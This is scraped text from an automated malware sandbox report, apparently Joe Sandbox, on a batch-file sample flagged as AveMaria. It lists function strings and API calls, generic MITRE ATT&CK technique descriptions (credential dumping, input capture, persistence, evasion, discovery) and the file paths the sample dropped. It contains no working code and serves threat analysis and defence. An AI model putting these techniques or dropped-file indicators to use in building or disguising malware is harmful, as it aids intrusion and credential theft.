Instruction ID: d1583ee1a6acfe37b9fe0ef69da40c7b6f294bba689008ef4b521474c273849b
Opcode Fuzzy Hash: edb0cb0deab1f2efa2935daabcf524841411944151e9099808bb147eef9d3293
Instruction Fuzzy Hash: A1C17C75A08342AFD704CF29E492A2EB7E1BF89354F408A2DF59997740DB30E901CF96

Uniqueness

Uniqueness Score: -1.00%

Function 39D070A4 Relevance: 5.2, Strings: 4, Instructions: 170COMMON

Download Yara Rule

Strings

Control Panel\Input Method\Hot Keys, xrefs: 39D070D2
Virtual Key, xrefs: 39D071EE
Key Modifiers, xrefs: 39D07211
Target IME, xrefs: 39D0725B

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: Control Panel\Input Method\Hot Keys$Key Modifiers$Target IME$Virtual Key
API String ID: 0-535188348
Opcode ID: b02da949f57847c511d064d11f4331a1dbd3409c7e56b35267ba3aede240e01e
Instruction ID: 531dc1b169f98ebffb89a1730dc29635fb8c7d5ab8731bc18c42f7e42ca6f868
Opcode Fuzzy Hash: b02da949f57847c511d064d11f4331a1dbd3409c7e56b35267ba3aede240e01e
Instruction Fuzzy Hash: 3C511175A01258FBDB209B69CC5AF9ABBB9EF4C350F408094BA49E7241DB709A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 39CD8AEC Relevance: 5.2, Strings: 4, Instructions: 157COMMON

Download Yara Rule

Strings

DefaultInputHandler, xrefs: 39CD8C4D
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 39CD8AFC
@, xrefs: 39CD8B2C
NaturalInputHandler, xrefs: 39CD8B4F

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: @$DefaultInputHandler$NaturalInputHandler$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Windows
API String ID: 0-1342585793
Opcode ID: 9308525a219976d5c323e50f0669fbd47f09bfa0e19139a00f7e48b24eb57442
Instruction ID: 480a910df3d12b8c1c6f924cbe312fd0c292ecbcc0a0741c7cd76dad106edc63
Opcode Fuzzy Hash: 9308525a219976d5c323e50f0669fbd47f09bfa0e19139a00f7e48b24eb57442
Instruction Fuzzy Hash: 51518DB5D02319EBDB119F95EC4AB9EBBB8FF48740F018065EA01F7260DB709906CB90

Uniqueness

Uniqueness Score: -1.00%

Function 39CEE1DB Relevance: 5.1, Strings: 4, Instructions: 54COMMON

Download Yara Rule

Strings

dpiAware, xrefs: 39CEE1F7
true, xrefs: 39CEE21B
per monitor, xrefs: 39CEE233
true/pm, xrefs: 39CEE229

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: dpiAware$per monitor$true$true/pm
API String ID: 0-651091444
Opcode ID: 0fb6060f4b11a190e37db301139c86f96191277cc569cdff7e4f55b4e108d151
Instruction ID: f764b714f74ad653615f191ff9cc67661a7a73036a6f09f988aebc59f9de8ea3
Opcode Fuzzy Hash: 0fb6060f4b11a190e37db301139c86f96191277cc569cdff7e4f55b4e108d151
Instruction Fuzzy Hash: E911A171D05268ABEB00DF95AC46AEEBBA9EB057E0F504228F812FB1C1D7709901CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00401050 Relevance: 5.0, APIs: 4, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00407483,?,?,?,?,0040741A), ref: 00401061
HeapReAlloc.KERNEL32(00000000,?,?,0040741A), ref: 00401068
GetProcessHeap.KERNEL32(00000000,?,00407483,?,?,?,?,0040741A), ref: 00401070
HeapAlloc.KERNEL32(00000000,?,?,0040741A), ref: 00401077

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: ff7eececf77962f920294a16e492e24f982f2512692d177d7c29219547ff1d8e
Instruction ID: 2712d228a57fbf8698cf9d3d6b4b6ec7aa2f7d27724a570ab9165bfe727cb767
Opcode Fuzzy Hash: ff7eececf77962f920294a16e492e24f982f2512692d177d7c29219547ff1d8e
Instruction Fuzzy Hash: D5D0CEB1914211EFCF115BB0DD1C9CB7EA9AB4C342B01CC69F64DD1170D635C594DB25

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PRODUCT.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: AveMaria

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Kyvoykbd.url

C:\Users\Public\Libraries\KDECO.bat

C:\Users\Public\Libraries\Kyvoykbd.PIF

C:\Users\Public\Libraries\KyvoykbdO.bat

C:\Users\Public\Libraries\Null

Windows Analysis Report
PRODUCT.bat

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre